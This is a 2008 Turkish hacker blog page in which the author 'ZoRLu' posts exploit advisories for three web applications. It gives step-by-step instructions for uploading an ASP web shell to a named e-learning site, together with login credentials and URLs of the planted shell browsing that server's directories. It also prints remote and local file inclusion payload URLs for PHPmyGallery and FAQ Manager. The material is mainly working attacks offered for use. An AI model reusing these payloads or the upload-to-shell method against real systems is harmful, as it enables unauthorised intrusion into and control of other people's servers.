E-Learning Portal Remote File Upload
link 1: http://www.exploiter5.com/all.php?id=47
link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt
Discovered By: ZoRLu
exp:
http://www.preprojects.com/elearning/uploaded/your_shell.asp
you register to site
login this site
after upload you_shell.asp
exp for demo:
register:
http://www.preprojects.com/elearning/new_student.asp
login:
role: select STUDENT
user: zorlu
passwd: zorlu1
shell
http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )
server daki siteler:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git
buda golden gate:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM
local file include etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
local file include etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
22 Aralık 2008 Pazartesi
E-Learning Portal Remote File Upload
9 Aralık 2008 Salı
PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities
PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7392
Discovered By: ZoRLu
file:
_conf/core/common-tpl-vars.php
c0de:
require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )
rfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
lfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]
25 Kasım 2008 Salı
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
link: http://www.milw0rm.com/exploits/7229
link: http://www.milw0rm.com/exploits/7229
Discovered By: ZoRLu
file:
include/header.php
exp:
http://localhost/script/include/header.php?config_path=ZoRLu.txt?
Kaydol:
Kayıtlar (Atom)